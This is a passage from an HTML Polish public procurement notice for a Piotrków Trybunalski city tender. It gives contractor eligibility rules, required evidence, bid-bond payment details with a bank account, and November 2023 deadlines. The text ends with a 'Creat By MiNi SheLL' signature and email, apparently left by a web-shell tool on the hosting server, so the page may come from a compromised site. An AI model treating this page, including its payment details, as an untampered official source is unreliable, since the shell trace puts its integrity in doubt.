wykonawcy mogą polegać<br/>na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają<br/>świadczenie do realizacji którego te zdolności są wymagane,<br/>2) wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego<br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów,<br/>3) wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia oświadczenie, o którym mowa w art. 125 ust. 1<br/>ustawy Pzp, podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału<br/>w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby,<br/>zgodnie z warunkami określonymi w pkt 2 ppkt 4,<br/>4) jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie<br/>potwierdzają spełniania przez wykonawcę warunków udziału w postępowaniu lub zachodzą<br/>wobec tego podmiotu podstawy wykluczenia, zamawiający żąda, aby wykonawca<br/>w terminie określonym przez zamawiającego zastąpił ten podmiot innym podmiotem<br/>lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu,<br/>5) wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności<br/>lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie<br/>polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie o aktualności informacji w oświadczeniu, o którym mowa w art. 125 ust. 1<br/>ustawy Pzp – załącznik nr 5 do IDW,<br/>2) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności<br/>do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie<br/>do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – załącznik nr 6 do IDW,<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych,<br/>które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków<br/>udziału w postępowaniu:<br/>Wykonawca dołącza do oferty (jeśli dotyczy):<br/>1) Zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji wykonawcy<br/>niezbędnych zasobów na potrzeby realizacji zamówienia, o którym mowa<br/>w art. 118 ust. 3 ustawy Pzp – w przypadku wykonawcy polegającego na zdolnościach<br/>technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów<br/>udostępniających zasoby – załącznik nr 3 do IDW.<br/>2) Oświadczenie o podziale zadań pomiędzy współwykonawców, o którym mowa w art. 117<br/>ust. 4 ustawy Pzp – w przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia – załącznik nr 4 do IDW.<br/>Wykonawca, którego oferta została najwyżej oceniona, zostanie wezwany do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni, od dnia wezwania, podmiotowych środków<br/>dowodowych aktualnych na dzień składania:<br/>1) wykaz robót budowlanych – załącznik nr 7 do IDW, zawierający jedną robotę<br/>polegającą na budowielub przebudowie, lub remoncie obiektów małej architektury<br/>o wartości minimum 200 000 zł brutto – wraz z podaniem ich rodzaju, wartości2<br/>, daty,<br/>miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane,<br/>W przypadku, gdy wykonawca wykonał w ramach jednego kontraktu/ umowy większy<br/>zakres prac, dla potrzeb niniejszego postępowania winien wyodrębnić zakres/rodzaj robót,<br/>o którym mowa powyżej i podać jego wartość.<br/>Jeżeli wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/<br/>umowy) realizowanego przez wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (konsorcjum), zamawiający nie dopuszcza by wykonawca polegał na<br/>doświadczeniu grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie<br/>wykonywał wykazywanego zakresu prac. Zamawiający zastrzega możliwość zwrócenia się<br/>do wykonawcy o wyjaśnienia w zakresie faktycznie i konkretnie wykonywanego zakresu<br/>prac przez wykonawcę oraz przedstawienia stosownych dowodów np. umowy konsorcjum,<br/>z której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur dowody określające czy roboty budowlane wskazane w wykazie zostały wykonane<br/>należycie, w szczególności informacje o tym czy roboty zostały wykonane zgodnie<br/>z przepisami prawa budowlanego i prawidłowo ukończone3<br/>,<br/>3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego<br/>– załącznik nr 8 do IDW, w szczególności odpowiedzialnych za kierowanie robotami<br/>budowlanymi, zawierający:<br/>Kierownika budowy, posiadającego:<br/> uprawnienia do pełnienia samodzielnej funkcji technicznej do kierowania robotami<br/>w specjalności konstrukcyjno – budowlanej,<br/> doświadczenie – pełnienie roli kierownika budowy przy realizacji co najmniej jednej<br/>inwestycji polegającej na budowie, przebudowie, remoncie tężni solankowej uzyskane<br/>w ostatnich trzech latach liczonych od od dnia składania/otwarcia ofert.<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych,<br/>które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> . Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 5 000,00 zł<br/>2. Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku<br/>następujących formach wymienionych w art. 97 ust. 7 ustawy Pzp, w zależności od wyboru<br/>wykonawcy.<br/>1) w przypadku wnoszenia wadium w pieniądzu:<br/> wykonawca dokonuje przelewu na rachunek bankowy zamawiającego<br/>(niedopuszczalna jest bezpośrednia wpłata kwoty wadium np. w kasie zamawiającego<br/>lub banku):<br/>Santander Bank Polska S.A.<br/>konto depozytów: 67 1090 2590 0000 0001 5213 1069<br/>w tytule przelewu należy zamieścić adnotację:<br/>Wadium w postępowaniu pn.: PIT STOP dla Aktywnych i Tężnie Trybunalskie –<br/>SPZ.271.37.2023.<br/> prawidłowe wniesienie wadium następuje w terminie uznania rachunku zamawiającego<br/>przed upływem wymaganego terminu, w wymaganej wysokości,<br/> ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych<br/>zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem,<br/> w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wadium<br/>może być wnoszone w częściach przez poszczególnych wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, przez jednego z nich lub przez<br/>pełnomocnika.<br/>2) w przypadku wnoszenia wadium w formie gwarancji lub poręczenia:<br/> wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia w postaci<br/>elektronicznej,<br/> beneficjenta wadium należy wskazać:<br/>Miasto Piotrków Trybunalski<br/>Pasaż Karola Rudowskiego 10<br/>97-300 Piotrków Trybunalski<br/> wadium musi obejmować cały okres związania ofertą,<br/> treść gwarancji lub poręczenia nie może zawierać postanowień uzależniających jego<br/>dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do gwaranta,<br/> musi obejmować odpowiedzialność gwaranta za wszystkie przypadki powodujące<br/>utratę wadium przez wykonawcę, określone w art. 98 ust. 6 ustawy Pzp,<br/> musi umożliwiać skuteczne zaspokojenie roszczeń zamawiającego w razie<br/>spełnienia przesłanek zatrzymania wadium<br/> np. nie może zawierać zapisu, że wszelkie roszczenia należy zgłosić w okresie<br/>ważności gwarancji, w przypadku gdy termin jej ważności jest tożsamy z terminem związania ofertą musi mieć taką samą płynność jak wadium wniesione w pieniądzu – dochodzenie<br/>roszczenia z tytułu wadium wniesionego w tej formie nie może być utrudnione;<br/> musi zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy<br/>dokumentu do zapłaty na rzecz zamawiającego kwoty wadium płatne na pierwsze<br/>pisemne żądanie zamawiającego – zawierające oświadczenie, że zaistniały<br/>okoliczności, o których mowa w art. 98 ust. 6, bez konieczności potwierdzana tych<br/>okoliczności przez wykonawcę i składania jakichkolwiek dodatkowych oświadczeń,<br/>dokumentów lub dokonania czynności przez wykonawcę lub osoby trzecie,<br/>bez pośrednictwa banku korespondenta lub innej tego typu instytucji,<br/> w treści gwarancji powinna znaleźć się klauzula stanowiąca, iż wszystkie spory<br/>odnośnie gwarancji będą rozstrzygane zgodnie z prawem polskim i poddane jurysdykcji<br/>sądów polskich, chyba, że wynika to z przepisów prawa,<br/> w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wadium<br/>może być wniesione przez jeden z podmiotów wspólnie ubiegających się o udzielenie<br/>zamówienia, z tym że w treści gwarancji lub poręczenia zaleca się, aby zostali<br/>wymienieni (objęci zakresem gwarancji/poręczenia) wszyscy wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia.<br/>W przypadku gwarancji/poręczenia, w której treści nie zostaną wymienieni jako<br/>zobowiązani wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia,<br/>zabezpieczenie oferty wspólnej będzie skuteczne jeżeli gwarancja wadialna zostanie<br/>wystawiona po zawiązaniu konsorcjum na pełnomocnika wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>3. Żaden z wykonawców wspólnie ubiegający się o udzielenie zamówienia nie może podlegać wykluczeniu.<br/>4. Każdy z wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie, o którym mowa w art. 125 ustawy<br/>Pzp, potwierdzające brak podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5. Zamawiający, mając na uwadze, charakter zamówienia i proporcjonalność, określa szczególny, obiektywnie uzasadniony,<br/>sposób spełniania przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, tzn.:<br/>1) Warunek określony w Rozdziale VIII SWZ IDW, dotyczący zdolności technicznej lub zawodowej (doświadczenia<br/>wykonawcy), musi spełniać co najmniej jeden z wykonawców działających wspólnie,<br/>2) Warunek określony w Rozdziale VIII SWZ IDW, dotyczący zdolności technicznej lub zawodowej (osoby skierowane przez<br/>wykonawcę do realizacji zamówienia) musi spełniać co najmniej jeden z wykonawców działających wspólnie.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach -w odniesieniu do<br/>warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty, w celu wykazania spełniania warunków<br/>udziału, oświadczenie o podziale zadań pomiędzy współwykonawców, o którym mowa w art. 117 ust. 4 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Umowa na realizację zamówienia zostanie zawarta na warunkach wymienionych<br/>w projektowanych postanowieniach umowy, stanowiących CZĘŚĆ III SWZ.<br/>2. Umowa wymaga, pod rygorem nieważności, zachowania formy pisemnej, zgodnie z art. 432<br/>ustawy Pzp.<br/>3. Zamawiający przewiduje dokonać zmian umowy bez przeprowadzenia nowego postępowania<br/>o udzielenie zamówienia, o których mowa w art. 455 ust. 1 pkt 1, określonych w § 10, § 19<br/>projektowanych postanowień umowy.<br/>4. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/832218</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-07 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com